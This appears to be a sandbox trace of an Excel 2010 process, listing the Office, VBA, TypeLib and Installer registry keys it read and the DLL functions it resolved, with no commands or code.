HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\14.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\AccessVBOM
\xe7\xa9\x98\xc8\xb5EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VBA\Vbe7DllPath
HKEY_CLASSES_ROOT\Licenses
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\QMEnable
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\RequireDeclaration
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\CompileOnDemand
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\NotifyUserBeforeStateLoss
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\BackGroundCompile
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\BreakOnAllErrors
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\BreakOnServerErrors
HKEY_CLASSES_ROOT\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7\409
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7\9
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7\0\win32
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.1\409
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.1\9
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.1\9\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.1\9\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win32

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AssertTimerVerboseLog
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LBBreakpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\QFE_17407
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{88D96A0C-F192-11D4-A65F-0040963251E5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\NoOleLoadFromStreamChecks
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MsoHeapInit
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DefaultSheetR2L
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\A4Letter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\CursorVisual
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\ControlCharacters
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\AutomaticPictureCompressionDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DiscardImageEdits
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DefaultImageDPI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\FallbackToStream
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\QFE_Saskatchewan
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ExtensionHardening
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\FileBlock\XlsmAndXltmFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\AllowPNG
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\RelyOnVML
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DownloadComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DoNotUseLongFileNames
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DoNotOrganizeInFolder
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DoNotRelyOnCSS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\ScreenSize
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\PixelsPerInch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\Internet\LocationOfComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Encoding
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Locations\AllLocationsDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Locations\BlockFQDNFileProtocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\VbaOff
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{90140000-003D-0000-0000-0000000FF1CE}\DigitalProductID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\00004109D30000000000000000F01FEC\EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features\EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\98C6F8355DA2600418456C7670479E08\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E7E71FA8D502F64CBDEC044521ED39A\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F53CAB350CF77D94AA5184C9C5104C0D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49DFBA7AF457A8B4EBD5783F921FACC2\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E76572D8D3D52F449849F14EDCB67B3D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\304225DA0A80689489E4CEBA8B478F00\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6C468F8F8250534E92DA89F1E20D9B0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\567D3332CC8D8B342B449DA5431AD4A3\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AD4E638E8714C454FA1AD399C0E81909\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\463248DC02BD31044AFEAB6A1D3BFBE6\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CAB7071E27686994093945B9EE85F69D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4F50307A57404AD4282F43A591BABC84\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05CEA9EC5FEA8574EA748DE4ABC952AD\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B5C02588961CF8428890C980B9F3DD0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\00004109D30000000000000000F01FEC\ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features\ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A609E893B628DD84791945C946C9CA5E\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E96B8FAE7CEA69C42B5B73BA69B21A71\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F58FB719C858BF4EAF245AC9DA59D1D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D90B8D0738CEDB14593B99ADD26D72C0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29731734CD2333940995A2B963A7E582\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D762436AF7B6B543820741456BDAF60\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F2A7E907B078294BBD356DC8840852C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\379E92CC2CB71D119A12000A9CE1A22A\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D9C9EE5ED897D1D4BA2F23CE5128B0F2\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\818AED26EAB038A4BB72C55277E8CE84\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\687330DB272F1A54C967131CC53B826C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\723C2F65179512E4D80BD2034028D528\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D8F5AB6B3B3FBA149A58A12B4A20334C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2338564DA4241F499CB8A1F84247C0E\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54077434B37616D4A9EA6F78E98A56BF\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\723BCECF7B08D0A4F864A2A08963643F\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9D474E7E9FB172E42A102B59039D88B0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D18DE905BD78FC48A594175D75DF03C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\85F98C50329537041A94BEA8DB880526\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4E6F86E1FEF077645B1002B7C560B871\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E009C76CEC08635368DB50E4DDD1CAA1\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7122F57A45DA6AE3EA412F558F665013\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A70728DA97715E8389326C667D0C7579\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B4CCCEF758F027B37977C1762C52F53C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A6D2077B64803E30B7837065053EB74\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CCCB6CC6A1A288037B4AA64D8B1B14B2\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ACEFFF49077DF5C37898805E60656DBF\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A8CD4AD91379E0F3B85DCF71AC8684DA\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFE8E5A39EFFBFB3C91EB0A7344C3917\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F8B3D16074B2F53B855F7CCCDC83FF6\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FB77723BFCB84D138A19CBBF155CD452\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1C0EE3236E87CE636B08EE9C7403EE19\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9FCE2B9622F87F2339EDB74D395D7D09\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\45613AFAE1635B33E95D40A9869823C5\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6BD3219F5F227C1388E4B254ECC53CBA\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96EB09331608BA034B79232D764B2973\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13A31C284359A9136A90E7B8EFC2DFBB\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC271526B8EBA073BB778D86B925A4D6\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\45552A042794885318BD5875621A61DA\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BB8A76146A1B263E890F48D1B0F01E8\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DBB1C92272110335A0AED12BD0473EB\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37709EB0F01C4FB319422B4DA2B2135C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E0F2919EC5305C236A7AD687E12EB4D3\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\595273BDEAD50DF3E8E69B1B0681CE84\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BEF2E9B13536084DBE2F1D2C9CCF79B\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9DA7BAFB053D9AE41AE7AAC762F84E26\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638BAF8FEC5E9F645963D084A26A0B2D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C9A6F846E2818A47A408CAF13381C71\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\00004109D30000000000000000F01FEC\VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features\VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\80EDA8F656FB006448BF06CFEF8BFC4E\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4EEF86DD963C1D111A37000A9CA05BF0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VBA\Vbe7DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E\vbe.dll_7.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\AccessVBOM
\xe7\xa9\x98\xc8\xb5EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VBA\Vbe7DllPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\QMEnable
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\RequireDeclaration
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\CompileOnDemand
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\NotifyUserBeforeStateLoss
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\BackGroundCompile
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\BreakOnAllErrors
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.0\Common\BreakOnServerErrors
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.1\9\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11A2F13\11A2F13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\VBAFiles

mso.dll.#2191
mso.dll.#3244
mso.dll.#8177
mso.dll.#1081
mso.dll.#5219
mso.dll.#10212
mso.dll.#740
mso.dll.#8515
mso.dll.#291
kernel32.dll.GetTickCount64
mso.dll.#2880
mso.dll.#4178
mso.dll.#9809
oleaut32.dll.#8
oleaut32.dll.#9
mso.dll.#6050
mso.dll.#3903
oleaut32.dll.#4
oleaut32.dll.#12
kernel32.dll.NlsGetCacheUpdateCount
mso.dll.#2213
mso.dll.#2763
mso.dll.#4894
mso.dll.#150
mso.dll.#7636
mso.dll.#1213
mso.dll.#5986
mso.dll.#1609
mso.dll.#1336
mso.dll.#8560
mso.dll.#1464
mso.dll.#3389
mso.dll.#1201
mso.dll.#4739
mso.dll.#178
mso.dll.#8714
mso.dll.#6146
mso.dll.#10482
oleaut32.dll.#2
oleaut32.dll.#6
mso.dll.#6642
mso.dll.#8401
shell32.dll.SHIsFileAvailableOffline
mso.dll.#3829
mso.dll.#3196
mso.dll.#1193
mso.dll.#4817
mso.dll.#1537
mso.dll.#413
mso.dll.#8978
mso.dll.#3954
mso.dll.#3289
comctl32.dll.RegisterClassNameW
mso.dll.#339
mso.dll.#8142
mso.dll.#1110
mso.dll.#2904
mso.dll.#950
mso.dll.#9370
mso.dll.#5971
mso.dll.#2468
mso.dll.#770
mso.dll.#2127
mso.dll.#8681
mso.dll.#4550
mso.dll.#1880
mso.dll.#6337
mso.dll.#6
mso.dll.#2996
mso.dll.#10454
mso.dll.#232
mso.dll.#1449
mso.dll.#3176
mso.dll.#6872
mso.dll.#5837
mso.dll.#6464
mso.dll.#703
mso.dll.#8922
mso.dll.#10350
mso.dll.#880
mso.dll.#6793
mso.dll.#5988
mso.dll.#9980
mso.dll.#5868
mso.dll.#6490
mso.dll.#7025
mso.dll.#8859
mso.dll.#1074
mso.dll.#3682
mso.dll.#1391
mso.dll.#10664
kernel32.dll.GetNativeSystemInfo
kernel32.dll.GetSystemWow64DirectoryW
advapi32.dll.CheckTokenMembership
kernel32.dll.GetFileAttributesExW
version.dll.GetFileVersionInfoA
version.dll.GetFileVersionInfoSizeA
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoW
version.dll.GetFileVersionInfoSizeW
version.dll.VerQueryValueW
mso.dll.#7482
mso.dll.#4991
sxs.dll.SxsOleAut32MapReferenceClsidToConfiguredClsid
mso.dll.#5115
mso.dll.#7086
mso.dll.#5116
mso.dll.#4589
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.IsProcessorFeaturePresent
vbe7.dll.DllVbeInit
mso.dll._MsoInitGimme@12
mso.dll._MsoFGimmeFeatureEx@8
mso.dll._MsoFGimmeComponentEx@24
mso.dll._MsoFGimmeFileEx@24
mso.dll._MsoSetLVProperty@8
mso.dll._MsoVBADigSigCallDlg@20
mso.dll._MsoVbaInitSecurity@4
mso.dll._MsoFIEPolicyAndVersion@8
mso.dll._MsoFUseIEFeature@8
mso.dll._MsoFAnsiCodePageSupportsLCID@8
mso.dll._MsoFInitOffice@20
mso.dll._MsoUninitOffice@4
mso.dll._MsoFGetFontSettings@20
mso.dll._MsoRgchToRgwch@16
mso.dll._MsoHrSimpleQueryInterface@16
mso.dll._MsoHrSimpleQueryInterface2@20
mso.dll._MsoFCreateControl@36
mso.dll._MsoFLongLoad@8
mso.dll._MsoFLongSave@8
mso.dll._MsoFGetTooltips@0
mso.dll._MsoFSetTooltips@4
mso.dll._MsoFLoadToolbarSet@24
